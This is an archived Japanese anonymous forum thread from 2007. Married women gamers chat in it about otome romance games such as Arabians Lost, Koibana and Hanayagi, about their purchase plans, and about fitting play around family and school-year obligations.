自分は恋華が積みゲーになりそうな悪寒。


102 :名無しって呼んでいいか?:2007/10/07(日) 20:49:46 ID:???
EDスレ見てたら恋華も気になるけど
その前に覗いた後押しスレで気になったパレドゥレーヌをポチったのでとりあえずこっち楽しみにしておこう。
連休って連休じゃないよな…うちは子供いるわけじゃないし好きにゲームもさせてもらえるんだけど
リビングに一日中ダンナがいるってだけで落ち着かなくて
ゲームしてても数時間おきに出てってなんか話しかけたりお茶出したりしてしまう…
乙女ゲーしてるのが後ろめたいのか、自分wあー。まだ一日あるのかぁ…

103 :名無しって呼んでいいか?:2007/10/07(日) 21:52:15 ID:???
2学期開始以降の疲れが出始めて
夜更かしができない今日この頃…
ちまちま遊べる無双ばっかりやってるよ
運動会は終わったが今後バザーだの就学前健診だの発表会だの
あれこれ控えててコンチクショーだ
萌えだけで突き進めた20代が懐かしいわw

104 :名無しって呼んでいいか?:2007/10/08(月) 11:47:16 ID:???
これから、入試本番で、毎週末文化祭やら入試説明会に、
夫と手分けして飛び回ってるから、肉体的にも精神的にも疲労たまりまくり。

コルダアンコの後にアラロスと思っているけど、気持ち的に手をつけられるか
わからないなあ。
無双のほうが、気分スッキリしそうだし、三國無双買いたくなってきた。(キャラ
変になったのもいるんだがorz)

早く来冬すぎてくれないと、どうしようもない。

パレドゥ、PCやったけど、血河王とか、宰相EDとか、全然みたことない。
でもあのゲーム楽しいよ。


105 :名無しって呼んでいいか?:2007/10/08(月) 12:39:39 ID:???
疲れている時の無双はいいよね。乙女ゲーをやる気力がない時は
無双かBASARAばかりやってるよ。

自分も2学期以降の疲れと子供の入院や通院等で慌しくて、調子を崩して
いたのですが、この連休に引きこもって恋華三昧で過ごしていたら、
やっと少しだけ気力がもどってきた。
やっぱり乙女ゲーは精神衛生上欠かせないなーと実感中w
充電した萌えパワーで秋の行事を乗り越えられればいいんだけど。
正月休みが今から待ち遠しいw

>>102
パレドゥ、自分も大好きだ。台詞の掛け合いも面白いし。楽しめるといいね!

106 :名無しって呼んでいいか?:2007/10/10(水) 20:54:01 ID:???
尼からアラロス発送しますたメールキタ!
メール来るまで正直忘れてたんだけどw

アリスは全くダメだったがアラロスは大好きだったんだ。
楽しみだー。先生待ってて〜。

107 :名無しって呼んでいいか?:2007/10/11(木) 00:40:19 ID:???
私も昼すぎにアラロスきたお
面白そうで楽しみだな〜

108 :名無しって呼んでいいか?:2007/10/11(木) 17:52:26 ID:???
アラロス、予約引き取りに行かねば!


109 :名無しって呼んでいいか?:2007/10/11(木) 20:59:44 ID:???
アラロス奥さまたち、どんなかんじですか?

110 :名無しって呼んでいいか?:2007/10/11(木) 22:21:42 ID:???
フラゲしたのにやる余裕がねー
明日こそやるぜ

111 :名無しって呼んでいいか?:2007/10/11(木) 23:27:34 ID:???
他の奥様方がアラロスってる中、自分は遅れて花柳購入
明後日くらいには届く予定なんだけど週末は来客が目白押しなんだぜ・・・orz

友人に切ないの好きなアンタならきっと気に入るよって言われたんだが
前作は未プレイなんで楽しめるかちと不安
前作やってないとわからない部分とかある?
そして今のとこ中の人で中村が一番気になってるんだが
ここの姐さんたちは中村て萌えました?


112 :名無しって呼んでいいか?:2007/10/11(木) 23:54:03 ID:???
>>111
中村よかったよ、萌えたし惚れた!
前作はやらなくても大丈夫です

113 :名無しって呼んでいいか?:2007/10/11(木) 23:59:00 ID:???
>>111
大石にやられた自分は、中村は最萌えにはならなかったが
それでもかなり萌えました。むしろ惚れた。
話は前作をやっていなくても大丈夫だと思うよ。

そしてアラロス奥様方、感想お待ちしています ゚+.(・∀・)゚+.゚

114 :名無しって呼んでいいか?:2007/10/12(金) 01:06:32 ID:???
>>109
テキストっていうか主人公の独白がとにかく長くて長くて長くて既にへばり気味w
プロローグを経てよくやくオープニングに辿り着いた時にはすでに2時間以上の時間が…
自分が読み進めるの遅いだけかもw
そして自由に行動出来るようになっても目標金額なんてあっという間で
残りの日数、何をしていいのかさっぱり…

でも地雷覚悟だったのでそれなりに楽しんでみようと思う


115 :111:2007/10/12(金) 07:33:39 ID:???
>>112-113ありがとう
そうか中村惚れるんだ・・・俄然楽しみになってきますたw
中の人の演技にも期待しとくよ

ところでみんな、今後の購入計画ってどうなってる?
私は今のところ確定がフルキス2アペンドとVitaminDSで
あとは恋GIG・放課後・ラスエス2と
微妙に地雷臭の高そうなものばかりに目がいってしまうんだがどうしようww

116 :名無しって呼んでいいか?:2007/10/12(金) 07:45:31 ID:???
自分は今の所コレってのがなくて凹んでるとこ。
期待してたラスエス2はキャストがビミョだったし
星色・放課後も気にはなってるけど地雷臭いww

評判見てからパレドゥーヌは買うかも知れん
後、アラロスと花柳も迷い中だが中々手が出ん。
なんかパっとしたの出ないかなあ、とかずっと思ってるんだけど
コレはそろそろ足を洗う潮時なのかしらん

117 :名無しって呼んでいいか?:2007/10/12(金) 08:04:35 ID:???
アラロス、今日の奥様ランチ会と懇談会が終わったら始めるw

今後の購入計画は、フルキス2アペンド(>形態に難ありだが、好きなのだ
あとビタミンDSと大人向けを一本
関係ないが無双とバサラ英雄伝も買う予定。

気になるのはいくつかあっても、ビズログや冷微等の雑誌読む時間無くて
新作情報にうといです。


118 :名無しって呼んでいいか?:2007/10/12(金) 09:33:53 ID:???
楽しみにしている乙女ゲーは、今のところ来年のリアルロゼくらい。
選り好みしているので、なかなか買うゲームがないよ…orz
デュエルラブはネタとしてちょっと気になるけどw
あと自分も無双5とバサラ英雄外伝は買う予定。

しかし年末の大掃除前に、そろそろ積みゲも少し片付けねばw

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)